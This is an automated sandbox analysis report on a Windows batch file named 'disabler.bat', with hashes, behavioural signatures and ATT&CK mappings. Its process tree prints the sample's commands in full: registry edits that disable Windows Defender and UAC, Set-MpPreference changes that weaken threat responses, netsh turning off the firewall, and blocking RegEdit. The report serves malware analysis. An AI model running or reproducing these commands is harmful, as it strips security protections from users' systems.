Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
08/01/2025, 05:12
Static task
static1
Behavioral task
behavioral1
Sample
disabler.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
disabler.bat
Resource
win10v2004-20241007-en
General
-
Target
disabler.bat
-
Size
2KB
-
MD5
c6aff26267067b25326560e96a81513f
-
SHA1
e45b8c290c2e9cf625ce255f6d31dda440e3d61e
-
SHA256
c7852d05266d27e604e7f988ef728a2d50edf1da816d5963ed93d643831a3e79
-
SHA512
d909cfdc454cefb0d26ae72311c27908749c4fa52b4eb2fdf893b30e5d22b024df6e7c8bf2a519877a4995b479e0176730fe5963992057c973a3e9f0569eb441
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
pid Process 4052 powershell.exe 4844 powershell.exe 4148 powershell.exe 2436 powershell.exe 2944 powershell.exe 2088 powershell.exe 2056 powershell.exe 436 powershell.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 3256 netsh.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 2944 powershell.exe 2944 powershell.exe 436 powershell.exe 436 powershell.exe 2088 powershell.exe 2088 powershell.exe 2056 powershell.exe 2056 powershell.exe 4052 powershell.exe 4052 powershell.exe 4844 powershell.exe 4844 powershell.exe 4148 powershell.exe 4148 powershell.exe 2436 powershell.exe 2436 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 2944 powershell.exe Token: SeDebugPrivilege 436 powershell.exe Token: SeDebugPrivilege 2088 powershell.exe Token: SeDebugPrivilege 2056 powershell.exe Token: SeDebugPrivilege 4052 powershell.exe Token: SeDebugPrivilege 4844 powershell.exe Token: SeDebugPrivilege 4148 powershell.exe Token: SeDebugPrivilege 2436 powershell.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 2628 wrote to memory of 3080 2628 cmd.exe 83 PID 2628 wrote to memory of 3080 2628 cmd.exe 83 PID 3080 wrote to memory of 488 3080 net.exe 84 PID 3080 wrote to memory of 488 3080 net.exe 84 PID 2628 wrote to memory of 3968 2628 cmd.exe 85 PID 2628 wrote to memory of 3968 2628 cmd.exe 85 PID 2628 wrote to memory of 4044 2628 cmd.exe 86 PID 2628 wrote to memory of 4044 2628 cmd.exe 86 PID 2628 wrote to memory of 4820 2628 cmd.exe 87 PID 2628 wrote to memory of 4820 2628 cmd.exe 87 PID 2628 wrote to memory of 2892 2628 cmd.exe 88 PID 2628 wrote to memory of 2892 2628 cmd.exe 88 PID 2628 wrote to memory of 60 2628 cmd.exe 89 PID 2628 wrote to memory of 60 2628 cmd.exe 89 PID 2628 wrote to memory of 2276 2628 cmd.exe 90 PID 2628 wrote to memory of 2276 2628 cmd.exe 90 PID 2628 wrote to memory of 2944 2628 cmd.exe 91 PID 2628 wrote to memory of 2944 2628 cmd.exe 91 PID 2628 wrote to memory of 436 2628 cmd.exe 92 PID 2628 wrote to memory of 436 2628 cmd.exe 92 PID 2628 wrote to memory of 2088 2628 cmd.exe 93 PID 2628 wrote to memory of 2088 2628 cmd.exe 93 PID 2628 wrote to memory of 2056 2628 cmd.exe 94 PID 2628 wrote to memory of 2056 2628 cmd.exe 94 PID 2628 wrote to memory of 4052 2628 cmd.exe 95 PID 2628 wrote to memory of 4052 2628 cmd.exe 95 PID 2628 wrote to memory of 4844 2628 cmd.exe 96 PID 2628 wrote to memory of 4844 2628 cmd.exe 96 PID 2628 wrote to memory of 4148 2628 cmd.exe 97 PID 2628 wrote to memory of 4148 2628 cmd.exe 97 PID 2628 wrote to memory of 2436 2628 cmd.exe 98 PID 2628 wrote to memory of 2436 2628 cmd.exe 98 PID 2628 wrote to memory of 3256 2628 cmd.exe 99 PID 2628 wrote to memory of 3256 2628 cmd.exe 99 PID 2628 wrote to memory of 2964 2628 cmd.exe 100 PID 2628 wrote to memory of 2964 2628 cmd.exe 100
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\disabler.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:488
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵PID:3968
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdBoot /t REG_DWORD /d 1 /f2⤵PID:4044
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdFilter /t REG_DWORD /d 1 /f2⤵PID:4820
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdNisDrv /t REG_DWORD /d 1 /f2⤵PID:2892
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdNisSvc /t REG_DWORD /d 1 /f2⤵PID:60
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WinDefend /t REG_DWORD /d 1 /f2⤵PID:2276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'EnableLUA' -Value 0"2⤵
- UAC bypass
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\ruta_a_excluir1' -ExclusionPath 'C:\ruta_a_excluir2'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -PUAProtection Disabled"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -HighThreatDefaultAction 6"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -ModerateThreatDefaultAction 6"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -LowThreatDefaultAction 6"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -SevereThreatDefaultAction 6"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -ScanScheduleDay 8"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2436
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3256
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d "1" /f2⤵
- Disables RegEdit via registry modification
PID:2964
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
1KB
MD5190cc2feb6fbf6a6143f296ebe043de5
SHA18fa72a99c46ed77b602476c85ca2d8ea251b22fb
SHA2564faea0a40060d02a3ea3ab01102ae3f964c3316146871b6877d845d7e5408206
SHA51294fc8e7d7fdc8fbc6f0b3c0c440b65c6074c22d6f0f328457988764645be763723e17e6c31bbd518cae5953297ec52de09f75c654275d54a8bd5e933ee0cc616
-
Filesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
Filesize
944B
MD57becdab2ad9e7d9ddc64007adfe686c2
SHA1fef71543e091354d4de3a9f7bee4ccb0ee42af4f
SHA256783470403ea42fc708f0f80a3fa5c88be41dcd378fa0d75446d39beb3275e662
SHA5121525f9b28f5b76851e50ac904a442f6a1f6f266efabb5b9e1a69049c62ba10fe2d6976cbe9f09a1811fa737838a12665f77e860f569eba317b8344b26d318a44
-
Filesize
948B
MD5929c856a9f5f4fd187b9b324e39be583
SHA1b5d74d5b632f2b0d892c0b763f7f9c36f8677fec
SHA25667fc49d5d72ee25add82821193e326f1109d7b88189560492686a8f9d8b6c97e
SHA5125746885b047af646bee26dc965c2fea100c395b2cc89a868af5d5858dd273497c3ea2f567c11439a84502cceea001a661352b8d0873c2cf09b1697c583fc61dd
-
Filesize
948B
MD53a1e249212d4af8ee7f335a5dfd075ba
SHA18ab2019e5d1376124bd79b822b9b1d4a794de076
SHA256046de684b024a7e2bcb771c259e58a1a3e7f2a920579290747bec845dcd419fa
SHA5128a463062e497760c41159b71480d1562e959969051e88d09be4f0ee9bed64805090021c1bb82c6eafba310cf471dc8879418fe512078d6e26c9a88575c78223b
-
Filesize
948B
MD5bd19bc9cb94a09e301fed47789e3e465
SHA1999814ece758478a6912e0cf61eccb2135606931
SHA2563eea57e35145bce1c62f119586b5cd7e8a0c140fb1ca5ee40db5784edeba7c1a
SHA512ad3bdde4ddbf94e136207900965c0c631b338895066205dff83ec2205f2ec11879b1e64ea67fe1e8145238d402177328cb8115494a0dce9400fc076836f29fcb
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82